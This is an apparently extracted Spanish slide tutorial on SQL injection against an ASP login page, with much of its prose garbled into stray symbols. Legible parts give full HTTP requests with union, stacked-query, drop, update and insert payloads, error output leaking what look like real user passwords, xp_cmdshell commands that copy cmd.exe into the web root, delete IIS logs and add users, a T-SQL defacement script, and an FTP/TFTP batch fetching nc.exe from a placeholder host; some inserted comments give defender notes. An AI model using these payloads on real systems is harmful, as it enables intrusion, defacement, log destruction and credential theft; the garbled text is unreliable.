Microsoft OLE DB Provider for ODBC Drivers error
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6 " :,-' " " 9 )
) # 5 :# " > " # )!% #, > % . " &
6 " . ;:! + " . " " " "
) " + "
:- .# ! #& +
5 ) & & + " 6 ( 9 " "
" . 6 " & ) " " ) " ) + "
"& " 9 ) 7 " " 6 . " 9
" " % . " & " " " #$% > 1 :1>&
D * ># EF> "
# ) " 1 :1 " " " " >) " "> 9 " *
. 4 #$%& " 9 " J " * "& " ) "
J 6 " ) " " ! 4 & " " J
1 :1& " " " > >& )
" " " " " ) " "
! " * # EF& " ) " 7 " .
" "
C
5 9 " " . ) " " 6 " "
( " 4 "& & " +
; " " 6 " 4 < + 7 " * 9
. " . "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y Y
Y H 9 6 " >! "" >
Y * . "
Y
H + L " " E ,F& & & * " "00
6 ( "& . 4 " " = 1
6 !:#; " " 6 )4 6 & ) " "
" . <
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
- " " 6 9 6 :,-' " "
) " " & 4 6 "
" E> ,> " 4 F " " ) 9 "
I 8 " 9 " " " " 1:& 6 ( " "
& " 6 " " 9 = "
, ) 9 " " " " " )
) ( & "= & + )
2
" " 6 "& " ) * " (
" " #$% ) " " ) " E! " " " )4 6
#$%KK& IIF
8 "& " " " " " " &
" " " " " " #$% 1 :1& 9 4
" # + " " " & "
) ) " ( & ; !: ,8 ,5;: 9
" " " 9 " . " "
! " " . & 9 " 9 " " " + I
:M& < ' " 5 + " < =" >5 6 #$%
4 ` a>& #$% ># > 6
* & 6 " " & #$% " <
* " " 4 " 9 " " " " " " "
" " " 4 " * 9 " 4 " +
> ,>
8" " 4 " 4 6 9 " " 1H5 ' 5 EA " "
" " F " 6 #$% " " >9 4 > 7 " 9
. # 1H5 ' 5
- & . " " 6 " 6 7 " . " " " +
" " "& " . ) ) " "
#$% ! . * & )" 6 " 9 " 6
1 &( ! (!
# 5 :#
4 # #
" " " # )!% #,
" " " . " ,
" " " ! ) ! *
" " " ! * M
" " " ! * "
" " " ! <# "
" " " ! <1
" " " ! M
" " " % " # "
" " " ,
" " " , M
" " , E1 ) " F
" " #
" " !G# E' " D F
8
' 6 & " * * " ( " )
"& " " + " " "& . " " "
6 " < " ! & " > .
" D > > . > " E! .J F 9 "
& " " "& " " ) " 9 " .
" " " ) " ) " " " " ) "& + " "
" 6 " " > >& 9 ;:,5 * *
6 " )4 6 & b 1;5 >86 "&
, " ) + 8 > . " " " " 4
. " , & " & E% " 9
) 9 F . . 9 " +
" "
2
4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "
= (! , 8 .=
# . "& >) " > ) " " "
. & " " 9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "
> $6 3 / (! 6#; !
% " " " & " ( *
#$% . ) " 6 " 1;: 9 " .
" . " E% 9 " * 6 " 6 " ( F *
* " 6 " " " , + !G#
H 6 " " " F + 6 " * 9 ) =
6 !:#; +
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
2
H + L < 6 EB F " <VLL "
<V <[ [L L[ "[L]L* " " U < " < " <
< W
-> $6 3 , 8 . ! (! 6#; !
6 ( " " & " ) " +
#8%8'; ) ( 7
" "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. " Y
H + "L " <& & & * < 00
) ( " !:#; * & 6 :,-' 6 6
" " ) " 4 " * . ) " .
* * " " "
Login de Usuarios Registrados
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! & ! (! 6#; !
6 ( ) " " " ) " "& )
( " & " . +
, :!& " " " . 4
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
H + L] ) < 00
- 6! !
; " " " " " " " " . & " " "
" 6 " " " . 6 ) " " " " "&
"& 9 ( 6 " 9 . * &
" " 5 " " " "
" ) " " 9 " * & . .
. " " " ) " "
$+6 4
H " 4 9 " " " !:#; (
"" " . " " 6= + "
!,5;8
23
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L " " " "VL1 6 ! ""L VL' L00
+4 4 4
# & . " * " !:#; & . "
+ 9 E5 9 " *
9 " " #$% # 6 F . "
H + 'delete from usuarios where UID='Usuario'--
1 4
$ " 1#8 ;& ) " 9 " "
4 & " " 9 &
" " " "& " " 6 " 6 " "
" " 9 + . " " " !
& " " ) ( . & +
4 " & . " E' " 4
KKKF " = " ) " . 9 =
9 " " ( " 7 & 6 "
" " "& + . ( 9 " "
" )
2?
5"= " & " 9 < " " " " 1#8 ; "
" 9 " ) " & 4 * " + &
" . = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " " + " " " 6 " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " " 6 " EL + " L&L +! "" LF00
% & & ! !
" . " . " ! " )
( . " 7 " " " #$% 4 " " ( "
" " " * " * &
) " 6 " II * 6 1: " " .
& " " * " 9 " * #$% # 6
" >8< # ! "> "
< "
$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " " ) *
" 5 . " "& #0#$% ) " ) .
2@
" " " < " "& "
" & * " ) ) " " " 9 "
5 ) " * " "& " " " " "
" " " " " " 9 " + " (
" " " < Q "
N Q " " 4 " " " 6 6= #$%
> " > " K 6 " ( = " " " " . "
4 " " ;;!
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + "L]8N8' " ) < Q " L < L00
:M ) " " " + * )
9 " 4 & " ) 4 " #5
E 6 " " " ) " ( < Q " F
, " * " " )" 6 " " "
= " ) " * " 6 > > . 9 "
) " * . " 6 " E8 " " & & & " & F
5 4 & 6 " . " " * " 9 "
" = 6 " " < Q " E/ " 1
) 4 " ) " " = "F
2
! "
EXEC master..xp_cmdshell 'dir c:inetpubwwwroot'
! 6 9 6
EXEC master..xp_cmdshell 'type
c:inetpubwwwrootalguna_pagina.asp'
! " )
EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe
c:inetpubwwwrootchroot.exe'
! ) "
EXEC master..xp_cmdshell 'DIR
c:winntsystem32logfilesw3svc1'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:winntsystem32logfilesw3svc1
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'
! 6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
! " 6 G "
EXEC master..xp_cmdshell 'NET USER username password'
:M& " ) . " " >8< # ! ">&
" . " " " " >1
8< ">& " " ) 7 ) " & 4 "
" " " " # " + "
'exec master..sp_addlogin MyUser, MyPass
9 " . " " ) 6 & " "
; " * & . . " " ) " 9
" ) & " " " " " >#
! "> + >8< # ! "> 9 ) = " " ) "
" " " ! " " " " " & " * " +
= #0#$% # 6 " * " "
" " + " " " 6 " * "
2B
" Q
" Q
" Q " +
" Q * .
" Q " 6 )
" Q .
< Q ) "M
< Q .
< Q .
< Q . M +
< Q . 6
< Q" 6
< Q "
< Q
< Q 6 .
- $ % + )
% " & * " & " " " +
" " ) " " " + 7 " . " " #$%
4 & * + " ' " ) 4
) " " & 4 " " 9
* ( " " " ( 4
" > * >
% " 7 "& 9 " ( 67" #$% E$ +
+( 9 9 " < ) " " #$% 6=
:,-'F& " 9 " " #5& " )
" " 322& ) " . *
9 " # ) & " . " + " #$%&
. " .
- " " & 9 4 * "
1 & " . " > . (( # + ; >& "
M <& < " " 7 "
6 " H " . " * . "
----- Extracto ------------------------------------------
[...] La idea es crear una página html o asp, si en
el sitio objetivo se encuentra activo y funcionando un
webserver [...]
-- Quoted T-SQL batch, reproduced as printed (line wraps and the stray page
-- marker come from the slide layout; path separators appear to have been
-- lost in extraction).
-- What it does: sp_oacreate instantiates Scripting.FileSystemObject,
-- 'createtextfile' opens index3.html under what looks like a web-hosting
-- directory, and each 'writeline' call appends one fragment of HTML to it.
-- Defender notes: the sp_OA* procedures are restricted to sysadmin unless
-- execute permission was granted explicitly, and the "Ole Automation
-- Procedures" option is off by default from SQL Server 2005 onward. Keep the
-- option off, run the application under a non-sysadmin login, deny the
-- SQL Server service account write access to web content, and monitor the
-- web root for files written by the database process.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:web-hostingattajdidindex3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "--
></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
2C
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV
align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR> <TD bgColor=#d20000>&nbsp;</TD></TR>
<TR> <TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR> <TR> <TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "--
></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
-- Quoted T-SQL batch from the same extract, reproduced as printed.
-- What it does: Scripting.FileSystemObject writes c:get.txt line by line
-- (FTP login lines, a 'get nc.exe' request and 'quit'); xp_cmdshell then
-- starts the Windows ftp client, apparently with that file as its script,
-- against the host written as NUESTROHOST (a placeholder in the original).
-- The final statement is the TFTP variant of the same transfer.
-- Defender notes: a database server rarely needs outbound FTP or TFTP, so
-- egress filtering blocks this step, and ftp.exe or tftp.exe started under
-- sqlservr.exe is worth alerting on. Both xp_cmdshell and the sp_OA*
-- procedures are disabled by default from SQL Server 2005 onward; keep them
-- off and do not give the application login sysadmin rights.
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:get.txt
NUESTROHOST'
o algo mas fácil si tenemos un tftp en nuestro host
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:mi_local_file c:remote_file'
3
----- Extracto ------------------------------------------
:M& ) & ) " " ( " * "
" )4 " . " " " 6 " " #0#$% # 6 &
6 " *=" " 9 " ) " .
" " " 8 " " & " " Q + " Q 9 "
" . " )4 :%8 " " * #$%
# 6 E " 4 " . * "+" )4 F + " 7 "
" " . )4 6 " ) "
;
" Q . & c " &
)4 M : ;! ;
` & < a
;
" Q )4 M &
` & 6 : ;! ; a
` & ` V a ` : ;! ; a
` a a
" 3 , +
# ) " " " & 9 #0#$%
" ) " " 9 " 7" " " "& )
9 " . " " & " * " &
9 ) 4 .J 6 " " J " " ) "
7 " #$% 4
! " 9 " D " + #$% 9 6
" ) " " " ) < " 6
& + = " ) " " " " ( " E: ) = "
"IF & " + * " " "
) * " 6 " . & " " #$% + "
5 ) "
* . >; : G ) 5 # + ! 4 > "
" 7 . " " ) " " #$% 4 +
" ) " " " " "
0 *
# L 1;: : ;A %8L
' > >
% + = " " + ) = " " J " " "
3
0 3 !
# )" " " ) "
1 :1 " )
H " " " E *Q* KF
1 " J " " "
0 +,-
# )" " " ) "
1 :1 " )
! " 5 "
1 " J " " "
0 $ .
# ':!S E8 " " F
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
0
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
" " " " " " " *
E< Q " & " Q " F
"@ % &
A . & 6 " . * % " " "
9 " " " * " ( ".
* & " " 6 ) " " #0#$% "
7 " 4 " "
' " " & " " & " "
. " . "& " " " " " ) ) )
" .
7 . " ( 6 # 6 ! M " "
6 " " 9 " " 6
7 . " ( " J " " " " 6
" " 9 " " 6
! 4 *=" " " " 6 " ) " "
8" ) ( ! = ' ( A " 6=
# * * " " < " " = " 8"
+ " ;'! 322 + ,! 323F
1 " " 6 " ) " " 6 ) " "
1 " " = & " 6 #$% " 6
" "
3
! " " " . " . * . E, " 6 "
) " " " " . ( & M" )
* . F
H * 9 6 " " "
" " #0#$% # 6
8" ) ( " 6 . " "& " ) " " 9
( " " " "
8" ) ( 6 " " . 6 " * " *
E " " " . ) 0 " " "
* ( " M " " MF
8" ) ( "" * #5
# " 9 " . & " " "
* " . " 6 #0#$% 6 '
1 4 ) ) " " 6 " "
" " " " . " (
" . " H 6 ) "
" ) " " ' 9 " " " " " " "
" " >$ > " " " 9 " " . ) " "
"A % B !
#0#$% # 6 " " & + " " ) " 7 " +
6 " " 6 " . " . " " " * " " "
" . & 9 9 " ) " " " " " ) + + " ( "
. 6 ( " " " " ) 4
" " " " " 6 " " " .
' " * & " " 9 . "
6 " " " 6 & < " " ) " " "
" . + " " " " 9 + = " " "
6 " ) " & " ) < 7< " + " " 7 "
M . " ) #0#$% # 6
8 " " " . "& "
" + "* ( " " A " "&
" " + # 6 " ! M" = & * . " " " 6
" ) " "& " . * " *
6 " " . G " & " ) " " 6 " " "&
" " " " ) > .= " ) " .
" . > + " " " " ) " " . &
) = 6 " #$% 4 . *= 4
# ) * " " & 74 " 6 " "
* M . * " G " 8 " & "
" " * "& " " " " " + " " " . *
) = " . " " " "
6 ) " 6 " E; " " #0#$%F 8"
) " " " " 9 " . " D " " . * )
" . ( # #;8 5 G "
32
' 6 G " 2& + " " " ) " 9 " "
" " ) " " " .
E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7
%81;: " * " ( " " "
" * & " " 9 " . ) "
" #0 #& #0#$%& # " " 8 !& " " ) ( "
* & " . & + 9
#:- 8 " " 6
5 " " 9 + "* " + 9 " )
" " " " " + " 6 " " & "
" " 7 " 5
" 6 " . " " 7 " #$% 4 & 6
9 6 " " > * " + % " ' ">
" " 9 " < 6
# " "& + " " <
5 " >5 . ! >
"C ) * # % & ! &
- M > M . 8< " G " > E #-1 B303B 022CB0@F
" M . M " Q QG "
"9 "9 Q 3
"9 " +
" * "9 6 6 " + "
" + " " #$% 4 G ! *
" " "
.Q#$%Q# 6 Q " .Q#$%Q 4 *
< . "" " 6 Q"9 Q 4 *
< . "" " Q 6 Q"9 Q 4 *
< . "" " 0#$% *
< . "" " M .0"9 0 "" " *
< . "" " 6 .Q ) " Q" + *
" " + 6 " ?,! 1 ! @8
" . " Q6 "9 "
"D !
M <
M " " + * " M M
M " " + . ' M " #9 )* (
33
M " " + . 1; " " #9 M (
M " " + . G "9 <
M " " + . G "9 . (
M " " + + . ) 5 "0 0 @0) (
<< "
" " " * "
"
" M " " MQJ "
+ " ; "
" B % ! (
01 ( , :! " 9 " " )+ 1
0 " . II )+ 5 .
0' ' % . " " F )+ 6
0S " * " ) " "
" ) "I )+ 5 . 59 =
6. &
** " * . & " " 9 " "
= " * " " 6 = " " " " " " (
. 6 . (( # + ; &
" . " > > < 1 ) 9 " * " 9
= = & + 9 " ) " " "&
" * 9 . " " + 9 " < " ) " " "
" " " ) " " )
8 " . . & . ( " " " 6 " " " "
D " 1 + 6 9 " "* ( " "
" * . 9 " " ") ( " " "
" * "
; ) 7 . " = + # 9 " " " "
" #0#$%& . " " " " .
/ " 9 " 9 67" " " " " " + *
" " " #$% 4 E8" . O1 <
/ # + # * % d " " " J "KF
! & . " " 9 " . " " "
" " " " . * & < " 9 D
5 " >5 . ! >


Tecnicas de sql injection

  • 1. !
  • 2. ! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
  •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
  •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
  • 5. ? # ) " ) + " " #$% ) " & 4 & * " " ) " " ) " " . 9 )6 ) = " ) 4 . & " 9 . " " & " 9 & " & " + ) " ) 4 " E' " " J " " " " #0#$% # 6 & 9 " 6 " " F 8 " " & " . " " ) " " 9 " 6 ) " " " " " " " #0#$% 9 " . & 6 6 " 9 " . " )4 6 & " 7 " #$% 4 %# ) ; . " & ". " * " " " " + " 6 "& 9 4 " " #0#$%& " "* " * & 4 " " "& 9 ) " . 6 " 8 " #0#$% " . " " >#5> + . " = " & "" * " " > > E- KKF 8 " 9 . " = & 9 6 " #5 " ( . " " 6 4 " EIF " #0#$% # 6 & ) " " ) " " " & " ) 7 " " 6 " < " 6 . "& " 4 & " " < " ( 1 ( * $# + ) #0#$% " < " " "& ) = " 1 % )" 6 L"& " 4 " " . " " < " " ) 4 " 5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = " " " ( 9 " 9 " " * " " & " " " ;'! ! + 1 ! 5 " + " 9 " E8" F ( ) " " & " 6 #0#$% # 6 & " " ;'! 332 5 ) " ) " I . " 9 . " ) " + ) 4 " 6 " 9 " " " + * " " " " ) 9 " " ) " " " . & 9 " #0#$% " & *
  •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
  •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
  • 8. B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
  •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
  • 10. 8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
  • 11. + ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
  • 12. select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
  •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
  •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xtracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
